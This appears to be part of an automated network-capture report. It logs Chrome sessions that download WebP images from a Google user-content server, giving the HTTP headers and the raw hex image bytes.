                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: e3 84 c7 b4 ed 5c 51 64 29 32 27 88 c1 fa 45 b4 85 39 d4 ba 68 23 1d 33 00 40 07 5d c8 a6 ca 4c db c3 d8 7c 71 6b fd a7 19 a3 ce b9 46 b4 d7 c1 3e 0a e1 a8 3a bd 81 d6 af af ac 7d b6 06 43 69 3e 7c ca 84 23 aa df f9 cc e7 af a9 15 41 35 c9 97 c4 b1 39 21 29 16 32 13 5e 95 67 52 48 14 06 de fa 7c d7 d7 6c 38 18 58 8d f1 0a 52 92 f6 38 d6 ae fd 90 a5 99 a0 91 df 30 de 37 ed 8b 42 a4 e3 47 0f 52 a0 c3 22 7b bd 48 24 c0 07 01 82 25 e5 89 7a 55 b0 69 a8 4e 5d 12 c3 ed 72 8b 0a e6 e3 7e 4a 99 42 72 79 2d 68 9a 4f 4e d1 3e b4 5f f1 9f c1 43 0f 6d 23 69 dc e0 1f ca 27 64 53 37 0a e9 ef 44 38 42 15 26 97 dc c4 7a 8a 0f 27 13 5c fd 1d b1 18 19 08 e7 c2 13 50 26 83 fa 01 09 29 d3 2f dc 56 8f 0f 16 08 94 87 fe aa 03 00 17 a0 51 84 8a c2 7f 83 5e de ce 19 bd 68 cb f1
                                                                                                                                                                                                                                Data Ascii: \Qd)2'E9h#3@]L|qkF>:}Ci>|#A59!)2^gRH|l8XR807BGR"{H$%zUiN]r~JBry-hON>_Cm#i'dS7D8B&z'\P&)/VQ^h
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 5c 1c 6b 3a d6 75 1d 15 54 86 e8 d9 2d e3 6c 3f b6 f5 29 a0 d4 73 83 63 53 39 c8 8b ba 66 a9 ee ad 21 96 a8 99 ec c9 fb 2d 34 02 da 0c a6 db 88 69 57 89 76 cb d3 b2 c3 8b ab ca e1 67 d0 b2 bd 5b 58 89 39 7c 15 a9 cd 10 3f 44 7e 9e d9 8d b2 76 7a 96 ba cc 70 78 34 bc 80 9d c1 04 d6 a4 a1 e3 d4 71 31 fa c2 7f 0b f7 9b e6 b0 e8 bc a2 11 68 76 89 cb a3 20 4c a0 ad fc 2d d1 3f e1 92 37 ab 8c aa 02 1c 29 57 cf 6b 49 20 87 a9 d3 ce 2a 15 f1 82 3d 7b af 41 4f f2 4c ea d3 67 40 8b ea dd f9 7f 11 7a 9c 16 d9 04 4c e8 fb e3 25 a2 04 a1 ef 63 a9 fb 72 52 38 e6 8a 04 58 5c 3f ae 24 56 ad ff c9 32 7b 8e 87 9d e3 03 a9 65 60 ae 2c 10 d9 ac 5b bd da bd 9d fe 4d c7 93 34 82 3b 60 b6 73 cf 52 ab b9 d4 95 f9 dd 86 91 26 63 2f 6c ed c8 76 3d ad 07 f9 bc 73 ef 5b b5 8a 5b 73
                                                                                                                                                                                                                                Data Ascii: \k:uT-l?)scS9f!-4iWvg[X9|?D~vzpx4q1hv L-?7)WkI *={AOLg@zL%crR8X\?$V2{e`,[M4;`sR&c/lv=s[[s
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC264INData Raw: 49 1a 3d cd 76 b7 3b 30 8f e2 86 b8 fb a7 66 0a 63 0f 09 e1 89 97 40 9c f0 e8 3f 3a 75 0d 67 eb 05 aa 43 36 d1 50 c4 eb 76 1b 16 07 fd 1e 6f 00 14 92 87 2d 81 8e 26 46 a8 b6 cf 60 b1 6a b8 89 40 af f2 0c a7 6e e3 d2 de 2f 9e 4e 29 06 de 8e 10 31 9f 5e 6c d4 0c 2a 17 d9 81 29 79 c5 ef 15 9d e9 64 07 7d ba 47 23 d7 2c c1 1d 28 b7 72 3c e3 a4 bf cd d0 1c 17 49 37 72 1f a7 ce 85 d2 04 b9 92 eb f3 8b 7f f5 68 00 5d 96 f9 c0 99 40 a0 05 4a f9 d9 b4 7c c8 12 ca fd 99 b5 fb 6a bb 82 e3 b1 45 c4 da 22 65 7d 80 ae db a0 8a e1 5b bd c0 41 29 a0 52 3f 8b ee 64 00 46 f1 a3 bd 2d 39 fb 72 d6 7e 20 1e 6e f3 ab e3 c6 64 19 ef 9b 35 00 dc 03 d5 b8 48 77 83 c4 a0 00 03 70 2b 9a d7 f9 a7 ff 9f 2c f1 8d 45 68 96 2f b7 cb 56 6c a9 dd 28 03 fc 90 57 55 57 2f 7e 7e f1 14 09 56
                                                                                                                                                                                                                                Data Ascii: I=v;0fc@?:ugC6Pvo-&F`j@n/N)1^l*)yd}G#,(r<I7rh]@J|jE"e}[A)R?dF-9r~ nd5Hwp+,Eh/Vl(WUW/~~V


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                127192.168.2.450031216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC529OUTGET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 9316
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7373
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC857INData Raw: 52 49 46 46 5c 24 00 00 57 45 42 50 56 50 38 20 50 24 00 00 d0 7e 00 9d 01 2a a6 00 28 01 3e 51 22 8e 45 23 a2 21 14 ca 56 34 38 05 04 b2 37 7e 3e 3d 80 0c ac 33 5f e6 7f 92 1d f2 1b 9b bf fe 39 7e ea 7f 99 f9 a4 aa ff 6a fe 89 fa 3b f2 77 e5 27 77 91 9b ec 07 f5 1f 9b 3f e3 fe 5f 7f 6b ff 65 fd 7b dc b7 e6 df f7 bf cc ff 7f fe 81 7f 48 ff d5 7f 60 ff 1b d8 9b cc 07 f4 0f ef 5f f9 3f e1 7b b1 ff a9 ff ad fe 9f dc df f6 7f 50 0f e9 7f e0 7f f5 7b 57 ff b0 f6 1d fd bd f6 00 fe 89 fe 93 ff af b3 af fc 3f db 9f 83 0f eb bf ec bf 70 3e 04 ff 64 7f f7 7b 00 7f e6 f5 00 e9 f7 eb 97 f9 0e d7 7f c1 7f 6a f2 0f c5 8f a9 bd be fe f7 ed 11 99 be c8 75 35 f9 6f da 1f d2 7f 8a fd cb f6 23 fd 6f 84 ff 23 bf bd f5 08 fc 93 f9 77 f8 df ec de 45 ff e1 77 1f 6d 3f eb 3f d2
                                                                                                                                                                                                                                Data Ascii: RIFF\$WEBPVP8 P$~*(>Q"E#!V487~>=3_9~j;w'w?_ke{H`_?{P{W?p>d{ju5o#o#wEwm??
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 8c cd 70 46 6e 59 27 35 72 83 2a 4c 67 29 7b a3 0e cd 4c df f3 c3 67 1d e0 07 a5 d1 b0 24 b0 5f 17 60 04 0f 98 49 b7 15 be 8b a4 30 90 90 cb ae 49 2f ac 04 ba d3 20 15 ce 15 51 ef 0c a6 a3 8b 84 40 74 1f 4d 2d 73 10 d2 d0 47 40 59 41 49 9f dc 4c 25 66 50 f2 26 29 20 b7 01 6d 85 67 3c dc 21 5e d8 41 32 35 a3 5a 90 8d df 10 42 1f a0 7b 06 2c 94 66 f2 eb 1f db ec 6a 89 71 e9 93 71 f1 fe ac 2c e1 ba 2c 6c 5d 20 1e bc 27 6b e6 6c 84 fe 58 5a b7 ce 5d 2b 43 bc ef c6 dc a9 f4 27 dd f1 96 f6 31 f7 4b ab f6 71 4a a4 65 d4 67 63 6b cc 03 98 66 de 58 2b de 44 c0 00 fd d1 77 f1 cd 82 3a 5d 7f 22 3b 2b 89 b4 d9 b9 9f 00 00 00 00 18 38 27 54 b6 6d a4 b0 87 50 c7 52 1b 37 8f 3c 0e f4 36 8d 75 52 b1 f3 67 e0 73 bc 7b d2 0c 1a c2 c9 0e 72 29 fe 98 43 5d 18 a1 8d 8c 0e 7b
                                                                                                                                                                                                                                Data Ascii: pFnY'5r*Lg){Lg$_`I0I/ Q@tM-sG@YAIL%fP&) mg<!^A25ZB{,fjqq,,l] 'klXZ]+C'1KqJegckfX+Dw:]";+8'TmPR7<6uRgs{r)C]{
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 2b b0 64 10 4f 61 71 22 f0 f0 ce b8 d0 79 de c6 22 89 54 1c 8a aa eb f0 58 38 80 75 2e a4 26 a7 b3 d1 f8 60 68 e3 92 8a 34 60 61 04 ce e4 fb 04 7e 44 d0 f0 40 d8 cc 03 1c e0 f6 7f ba 4e 94 75 52 fe 55 6c 4e a5 08 34 60 0c c0 fc f8 ce 81 2c 3f 73 58 d0 49 07 c4 37 f5 c0 6f 37 54 47 de 7b af e6 3a a1 69 89 c1 7d 51 a7 42 58 6f 88 7d a7 d1 53 f5 e9 d9 31 b3 b1 a3 7e 37 90 b6 f8 2c 98 d3 65 e1 3a f8 a3 fa bc d4 94 a0 8c be 64 ad 9a e0 8e 92 03 a0 01 b4 65 0a 75 98 d9 60 20 3c 45 f1 18 48 2e 55 08 67 fd 6e 45 16 57 d7 49 a7 bb 30 60 8f 42 c3 cb eb 62 a9 05 02 da 3a 3a 57 fc d1 c7 55 30 8a 1c e3 df 10 27 c9 79 ee b7 bb 7e 4f e4 ff 3f 4c dc 25 8c b7 f6 38 4b 7c 77 d7 13 26 6a f1 4f 06 d6 08 00 ec ff 80 e4 5b 9d a5 d7 9e 07 a0 18 00 fd 00 ae e9 58 9c 8b e7 5b eb
                                                                                                                                                                                                                                Data Ascii: +dOaq"y"TX8u.&`h4`a~D@NuRUlN4`,?sXI7o7TG{:i}QBXo}S1~7,e:deu` <EH.UgnEWI0`Bb::WU0'y~O?L%8K|w&jO[X[
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 1e 54 f5 1e 88 74 1e 98 01 69 96 f8 0d a9 ee 1f 84 05 5f c6 64 36 6a 74 61 f6 d5 c8 89 89 d5 ec 9c ab 7f 8a d0 91 af 0e bf ea 14 6f 56 c6 11 55 21 04 05 fc 4a 49 7e 87 d4 75 49 8e 50 22 9e 11 52 5b 4b 51 bd 72 72 ce c8 1b ed ec 42 51 e2 dc 99 d8 79 9e 4c 93 3f e1 f8 73 e3 cb 06 87 91 f6 c0 da 58 83 d1 e4 46 40 25 04 ff 9e 75 5f d6 f2 de 9d d1 2a ca fe 6a f6 d2 84 95 ba 83 f7 c0 1f 90 b2 95 3d 4b 91 a5 db c9 3f 6d 60 25 cc 42 36 08 6b 89 6b c5 af d8 bc c5 03 83 0a 3b cc 93 8b 27 b3 44 a3 f7 0b b0 d6 d9 57 7a 41 9e 5b 53 24 82 ab 6c 49 fe 66 a6 74 a7 cc 62 33 bc ad f7 d4 fa d0 07 21 dc 6a b3 1d 4e 94 34 0a 32 2c 17 59 4a bb f5 e8 ec c7 7e bd 0a 4f 95 02 91 a2 54 f5 ce 17 44 6b 73 88 45 df 44 1f f6 47 6a 0d 45 63 fb c7 fc 59 69 72 27 58 5c 50 a6 8d a1 92 9b
                                                                                                                                                                                                                                Data Ascii: Tti_d6jtaoVU!JI~uIP"R[KQrrBQyL?sXF@%u_*j=K?m`%B6kk;'DWzA[S$lIftb3!jN42,YJ~OTDksEDGjEcYir'X\P
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 53 18 2f 49 6f 18 37 0a d5 9d fb 4c c5 d4 23 17 59 5d 0f 2b a9 10 01 83 a5 97 7e a9 f0 f1 d3 d7 ac df a3 93 22 20 a7 6c bf 5c 92 a6 1e b9 46 1d a0 bc 41 e7 c8 88 b7 26 05 44 ef f7 b1 cf ff 84 dc ad 52 7a d9 80 c2 86 5f 12 6e 5d 4d 59 c1 88 e6 05 6c 78 1b 75 08 f0 4f 67 8e ad d4 be 13 8e 16 b7 49 da 7c bf a3 e7 fa 4f 16 19 44 9b de c1 42 83 01 17 fa 89 72 eb 5b 29 32 ca ec 0a 19 e8 31 75 f8 20 75 8b e0 10 61 7a 02 9d 6d cb ca 77 3e b8 4a 3a 92 3b 73 ac f6 35 34 37 01 96 54 d9 a4 f8 91 21 f1 98 7f 53 27 a1 6e 17 23 ab 2d 15 f1 da 26 27 8c 4e 97 20 01 fe 9b d7 b0 ad d5 a0 2d 55 a5 9b 35 79 7a 54 8e b9 b1 90 cd 3c 40 57 65 f3 99 b3 cf d8 23 12 8d cf cf e6 93 3d db 90 f2 4e 93 18 70 28 1e 68 a4 ba 43 1d e9 bb ad 63 61 64 94 7d c0 9f b1 32 92 c6 42 43 fb 54 97
                                                                                                                                                                                                                                Data Ascii: S/Io7L#Y]+~" l\FA&DRz_n]MYlxuOgI|ODBr[)21u uazmw>J:;s547T!S'n#-&'N -U5yzT<@We#=Np(hCcad}2BCT
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 47 ab 3c 66 12 b2 ef 65 12 30 2b 47 3c f3 ea 4b 6d 0a f6 50 14 c8 80 a2 aa 10 e3 d2 52 3e 91 e1 6c 75 41 af 48 d0 6b 94 c2 28 fd 68 4b 59 30 76 30 51 5b d3 5b b2 af 1b da 6c 41 46 16 69 86 6e cc ef fd d8 a7 de 02 bf 6d 94 86 47 d9 0a f4 5d 69 fb e3 77 01 d9 65 9c a9 8c 82 8a bc 42 25 6a b3 1f ab c5 58 b5 56 ac b1 ae 0c 26 c4 45 0c 4e 34 f1 85 74 a2 23 cd 5f a0 1c 3d 4a 64 73 8b 81 07 09 96 ce 5e 9a 4d 4f aa a2 2e 44 88 ec d6 bf 1f 81 c1 e0 9a 1d 6e 42 1f 58 66 7c 69 39 57 16 e4 b1 29 18 89 2b 86 6a 96 df 91 af 1c 23 49 63 21 cf 38 6d 84 b7 34 91 7e 02 06 18 c3 d6 1b bd 39 90 df 5b 1a 56 59 cf 15 17 15 c0 d1 9d 7c d8 61 35 fe a1 3d f8 64 ae 98 b7 73 65 34 65 fe 7f e3 17 e4 41 7b 7c bf 7a 53 d1 41 7a 24 3c 46 1e 84 70 e2 15 d3 83 d8 85 4c c0 f1 7e a4 72 58
                                                                                                                                                                                                                                Data Ascii: G<fe0+G<KmPR>luAHk(hKY0v0Q[[lAFinmG]iweB%jXV&EN4t#_=Jds^MO.DnBXf|i9W)+j#Ic!8m4~9[VY|a5=dse4eA{|zSAz$<FpL~rX
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: af 7d 6a 93 84 b9 2d b2 ce 52 9e 72 3c bf 33 93 4a 82 0c c5 8f 80 71 34 16 2f a1 70 b5 e0 35 52 43 e2 13 7d 31 aa 7e 1c a8 90 01 a6 dc 3d 35 e1 fe 03 eb d7 4a 67 68 19 cd 62 f4 5d a2 42 f6 4e c6 e7 de 2e 53 04 6a e8 4f 5d 6c 6c 8b a4 de ef 5e 0b b5 1b 34 87 c9 3c ea 51 96 30 e8 80 b3 ac f1 83 b8 a7 89 7d 7d cd c7 85 e2 68 20 c3 2b fd 2c 00 42 7b bb 9d 12 6f 1d 67 9b 0a 2c 4c 78 af 47 03 db 7a af fd c3 5b 8b 59 df c6 b2 4c 93 43 bd 8c de d0 df 82 5f 3b 34 04 71 7a 47 55 0f f8 0a 1f 8d 4d 7a 62 28 9a 28 e9 5b 75 e5 6f 28 1d 4e 2f 80 9e fb 4e d8 71 47 e4 9b ae 15 1b cd a7 d4 d0 08 ff ce 86 24 70 5f 2f 27 4a ab 2d 1e 31 41 9b 86 ea cd e2 ed c0 73 15 54 df a0 49 3d 9b a8 5f a5 14 8b 3d 90 af 4f f1 8f 36 54 2a f8 f6 7b a3 eb fe d5 03 89 79 5d f0 a0 b0 e6 d7 b8
                                                                                                                                                                                                                                Data Ascii: }j-Rr<3Jq4/p5RC}1~=5Jghb]BN.SjO]ll^4<Q0}}h +,B{og,LxGz[YLC_;4qzGUMzb(([uo(N/NqG$p_/'J-1AsTI=_=O6T*{y]
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC119INData Raw: 82 73 02 1b 12 82 f5 28 f4 50 99 9b 7c 66 ca 85 83 97 78 1a 76 a0 61 9b 4a 71 80 9c 3f 24 f5 24 bd 49 dd c7 cd 5c 37 e3 82 67 d1 b3 12 e6 c9 c7 15 18 7c af 38 e5 91 f7 a2 a5 0a 6e 91 0f b0 3d 52 47 b7 d1 e3 56 5f 80 fe e9 60 24 8b 42 ad 0b 3d 71 04 2f 24 72 d5 83 4f 5b 09 c2 8b 10 2e 97 76 4c 2c d6 c2 55 e0 f6 32 2e 66 8b c9 f0 26 8e ca fd c3 56 00 00 00
                                                                                                                                                                                                                                Data Ascii: s(P|fxvaJq?$$I\7g|8n=RGV_`$B=q/$rO[.vL,U2.f&V


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                128192.168.2.450035216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC529OUTGET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 9204
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7373
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC857INData Raw: 52 49 46 46 ec 23 00 00 57 45 42 50 56 50 38 20 e0 23 00 00 30 7e 00 9d 01 2a a6 00 28 01 3e 51 20 8d 45 23 a1 a1 15 e9 46 44 38 05 04 b1 01 d8 0f 36 9a bf e7 3f 23 bb de bd 1f 79 fc 8f fc a7 f9 86 b1 bf 76 fe d3 fa 4f fb 2f 24 95 95 e5 99 cb ff eb bf c2 fe 57 7c cf fe df ff 4b fc 77 f7 cf 83 df 9f ff f2 7b 81 7e 9f ff bf ff 09 fb 61 da 97 cc 4f f5 2f f1 df f5 ff c1 7b b9 ff bf fd 80 f7 45 fd ab d4 03 fa 1f f8 ff 58 ef f9 1f ff fd c9 bf bb 7f b4 ff ff ee 1f fc df fc 17 a6 a7 ed f7 c1 b7 f6 ef f8 7f b8 9f 02 7f af 9f f9 3f 74 bf ff fc 80 7f f1 f5 00 ff d1 ea 01 e9 af d8 4f ef 7d ba 7f 80 fc 9c eb bf f6 0f b5 7c c1 e2 65 f2 af b9 7f b0 f5 b5 fc 87 fc ef 0d fe 1e ff 9f ea 05 f9 67 f3 0f f2 9e 24 fb 76 34 bf dc 6f 50 5f 6d be 99 fe e7 fc 27 e4 7f a5 67 fb 7e
                                                                                                                                                                                                                                Data Ascii: RIFF#WEBPVP8 #0~*(>Q E#FD86?#yvO/$W|Kw{~aO/{EX?tO}|eg$v4oP_m'g~
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 05 d6 05 48 3a 23 ca fd 96 13 02 6c be 4e 6c ef c5 51 05 92 d9 34 44 52 6f 93 ed 8a f7 e8 8f e7 02 50 9b c3 35 b1 94 ed 24 d4 98 89 24 7a c9 99 ad cb b5 84 00 89 19 d9 c7 45 07 e4 76 73 8f 67 5b 71 f6 55 a7 8d 94 c9 72 08 76 3a de 90 28 e6 3e c9 d6 b8 64 47 78 b3 8d f9 ae 89 fa f7 71 e2 56 5c e0 88 0f f3 ee 45 82 6d 1b c7 8f e7 de 09 4a 84 31 df 22 2e d7 7f af b9 fd cd 3c ce b0 93 79 dd c6 15 a6 75 88 0a 1b de 66 33 aa 67 04 94 b5 c8 40 8c 81 52 73 04 6a 0c 1f ab c4 94 b3 2b 3f 55 03 67 b9 42 20 f3 a8 6f 94 5e 25 b4 93 e6 56 75 b0 9e e0 00 fe f6 55 da 20 2c fd 31 aa e7 f3 2a a1 ac f3 ba 88 73 c3 c0 00 04 f0 b4 18 fc 4c 71 73 93 5e d4 f3 31 dc 09 ba 62 89 b3 e8 b2 f2 62 92 e9 04 cb f3 5e ed 8e dd 3e b5 65 97 47 28 a7 9b 0e 0c 28 79 c5 4f 21 9a 65 b3 e1 c7
                                                                                                                                                                                                                                Data Ascii: H:#lNlQ4DRoP5$$zEvsg[qUrv:(>dGxqV\EmJ1".<yuf3g@Rsj+?UgB o^%VuU ,1*sLqs^1bb^>eG((yO!e
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 2d 6f 6b bb 31 2e d4 0a ef 9d 31 ae 79 6a 6f 6c 0c 7b c2 68 39 7e ec 8e 23 d4 0a cf 6c e1 fa 56 f1 da 12 5e d5 b5 e3 28 b3 00 0f 18 4f ce 0d 7b 5c 46 bc 50 e8 9e 00 49 17 4d fd e5 88 f4 8b f5 4c 33 24 cf dc 3b 4a 5c 32 99 a8 ac c7 ea fd 72 02 11 83 73 b8 f6 3f 19 7b 78 97 65 56 4a b8 ec 81 0b 0f d8 76 c0 e7 43 1f c8 49 68 91 57 e5 86 ae c5 a3 51 b7 03 b4 8d 59 de fe a1 a9 a0 5b 54 31 4d 6a f7 c1 d2 1d 3c a3 62 ee f0 d9 24 f9 43 89 5e 55 fc 9d e3 12 42 1c ea 0d be 34 b5 b2 93 86 0a 22 09 21 d0 4c 94 c7 f8 b5 ac 27 83 7a 42 f0 18 5c 71 33 42 f3 c6 36 57 8f f0 1b c9 ff 41 6c 52 1f 19 38 27 16 25 60 08 3f ae be f6 0a 8f d3 bd 1a d2 87 2f 29 94 64 92 52 d9 cc 81 83 33 1c bf 23 ff 4c 03 f5 93 07 08 e6 9e 4d f6 0c bb 0f 62 c8 cb 02 33 83 4b 0b cd a3 80 1d 79 1e
                                                                                                                                                                                                                                Data Ascii: -ok1.1yjol{h9~#lV^(O{\FPIML3$;J\2rs?{xeVJvCIhWQY[T1Mj<b$C^UB4"!L'zB\q3B6WAlR8'%`?/)dR3#LMb3Ky
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: f0 53 f8 80 83 b7 29 d1 65 15 98 b2 25 0a 66 d0 3f 88 16 c3 b9 52 1c bc 53 bb cf ef d9 1c be 01 3f 2f f3 8b 53 8d f4 39 04 51 39 17 e0 13 fb d9 c9 74 de 61 88 d0 f6 3c a1 e9 71 56 26 a7 e3 48 e1 2d dc d3 56 2e eb 3f c3 8e 7a 5e 4e f6 4c 10 81 ce 9c ad 8d a3 3c cb ff db a5 2b 5b 5b 65 98 b2 49 97 07 2c 64 f7 96 3e fa 52 90 3e 98 92 fe 62 46 50 23 fe 07 d5 fd 56 29 e9 6c 0b b8 82 ad 79 6c 92 84 7a 26 82 6b 0a 3d 8d b7 50 8c 78 d8 cf 63 e8 6b 32 90 05 86 76 2f ed 01 a3 a9 ec 8e ac 19 a7 6b 32 90 43 1d 42 78 89 0f 53 03 96 7a cc c9 2e 2a 78 47 9e 81 af 4f 25 6f 4a 91 cf 8c 93 a0 51 23 d7 47 22 25 b1 7a 1f 07 be 80 6d d8 f0 d9 76 ee 6c ab f5 2b 9a 45 63 9a 8e b8 da d8 60 88 ec f0 96 a5 70 9a ea a0 f5 e1 e2 ce 4e 53 ea 34 09 a9 0f 4f 54 47 af 69 d2 0e 67 01 37
                                                                                                                                                                                                                                Data Ascii: S)e%f?RS?/S9Q9ta<qV&H-V.?z^NL<+[[eI,d>R>bFP#V)lylz&k=Pxck2v/k2CBxSz.*xGO%oJQ#G"%zmvl+Ec`pNS4OTGig7
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 76 3f 72 1d 92 a1 aa 5b cb 6d 1a f5 04 63 79 d9 9d c9 fb 8f e4 c5 9f 12 66 c3 b8 0a 6d 2a 4b c3 b4 de d3 12 0b 19 1b 76 1e 4c 64 aa 02 67 3a bd 49 25 8f 80 1c 78 1a 4c 7f e4 e8 be 96 96 14 af 56 d4 da e0 00 8e e7 02 3a 3f 59 7f 78 35 96 21 1f 3b 75 c9 8e b7 78 c9 92 e7 f1 1e ff 38 ca f2 33 f2 0b 9a 12 64 19 db ff 1b 0e 71 a5 5c e3 2e 87 e3 d0 ee 88 5c 08 85 1b 5f 09 ff 4f e4 1b 66 ee 74 3b fb ee b5 a1 f2 26 88 ac c0 c1 65 34 e4 8a fe b3 99 6c ea 31 38 25 ce 7e 97 89 4c b6 cd ce 67 bb 98 fe 0e c4 db 5f fe 93 a1 f1 d3 86 38 dc 3b 00 1d e6 cb 3a 0f 60 ab 57 58 da ee d9 30 dd c8 b7 02 60 b7 bb ac 4a 64 98 e8 d8 5c 6e 24 64 00 51 5b 26 c7 9c c3 9e aa 48 65 29 86 41 59 8f 41 f2 d0 a2 c2 e0 fd c4 ca 3f 78 61 26 bb a6 aa a5 a2 70 e3 da eb 57 4b 42 d1 32 0d 76 4f
                                                                                                                                                                                                                                Data Ascii: v?r[mcyfm*KvLdg:I%xLV:?Yx5!;ux83dq\.\_Oft;&e4l18%~Lg_8;:`WX0`Jd\n$dQ[&He)AYA?xa&pWKB2vO
